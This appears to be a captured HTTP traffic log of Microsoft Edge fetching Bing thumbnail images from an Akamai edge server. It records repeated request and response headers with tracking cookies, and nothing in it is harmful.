cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 420
cache-control: public, max-age=1379229
date: Thu, 17 Oct 2024 21:03:50 GMT
x-cache: TCP_HIT from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199030.9b45455
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.34827b78-0d1b-43ad-9aac-ade7717dedc6&w=32&h=32&qlt=94&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=ODLS.34827b78-0d1b-43ad-9aac-ade7717dedc6&w=32&h=32&qlt=94&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1050
cache-control: public, max-age=1448018
date: Thu, 17 Oct 2024 21:03:50 GMT
x-cache: TCP_HIT from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199030.9b45457
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OIP.r5TsDIuc-wua94BPlWVPewHaE7&w=80&h=80&c=1&vt=10&bgcl=5da68a&r=0&o=6&pid=5.1

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=OIP.r5TsDIuc-wua94BPlWVPewHaE7&w=80&h=80&c=1&vt=10&bgcl=5da68a&r=0&o=6&pid=5.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1098
x-check-cacheable: YES
cache-control: public, max-age=1379494
date: Thu, 17 Oct 2024 21:03:50 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199030.9b45439
GET

https://th.bing.com/th?id=ODLS.20cd948f-abd8-42b2-b05c-d217d2760350&w=32&h=32&qlt=95&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=ODLS.20cd948f-abd8-42b2-b05c-d217d2760350&w=32&h=32&qlt=95&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1392
x-check-cacheable: YES
cache-control: public, max-age=573806
date: Thu, 17 Oct 2024 21:03:50 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199030.9b45451
GET

https://th.bing.com/th?id=OIP.YZQ90vfFDbTT1IsyUXkf7AHaEc&w=80&h=80&c=1&vt=10&bgcl=bd0487&r=0&o=6&pid=5.1

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=OIP.YZQ90vfFDbTT1IsyUXkf7AHaEc&w=80&h=80&c=1&vt=10&bgcl=bd0487&r=0&o=6&pid=5.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2535
x-check-cacheable: YES
cache-control: public, max-age=1778640
date: Thu, 17 Oct 2024 21:03:50 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199030.9b45453
GET

https://th.bing.com/th?id=ODLS.360b16ff-5978-40e3-9c67-ff327e5ca418&w=32&h=32&qlt=96&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=ODLS.360b16ff-5978-40e3-9c67-ff327e5ca418&w=32&h=32&qlt=96&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1065
x-check-cacheable: YES
cache-control: public, max-age=1691896
date: Thu, 17 Oct 2024 21:03:50 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199030.9b4543c
GET

https://th.bing.com/th?id=OIP.5aDiscebQgPfvKR9LaeCGAHaE7&w=80&h=80&c=1&vt=10&bgcl=547a77&r=0&o=6&pid=5.1

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=OIP.5aDiscebQgPfvKR9LaeCGAHaE7&w=80&h=80&c=1&vt=10&bgcl=547a77&r=0&o=6&pid=5.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:46.2911371+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-10-17
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210347
cookie: ipv6=hit=1729202627525&t=4
cookie: bm_sv=DE1BAE809C3BB39BA4C720F959BCB395~YAAQwnd7XFaoJoySAQAATjxLnBlxCHeTPAuJ+2E8KX4UPJL8fjGlWbleHQrsTckqsOLTAcrpUMpeYW4YKBhkI7uNrxvpERx85lAtdCelv+Xy0V5hSjFG1HZQmfcvRhNlYdQXLNKem5gvH9iKPJPttZVx+Z9vJ0QBDvP1YygNcTw35m4haIGW4Ujsg9GRXVY8Gr5yEMprIZHo4FDqP5drqVsOzIAuTOS5D2Z7RLXdYSQ22lYHPN0OG5Cd7YUhEA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199026&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1966
cache-control: public, max-age=1209541
date: Thu, 17 Oct 2024 21:03:50 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199030.9b45450
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.2eb3a562-e68d-4b64-8755-6c06140f4654&w=32&h=32&qlt=97&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=ODLS.2eb3a562-e68d-4b64-8755-6c06140f4654&w=32&h=32&qlt=97&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
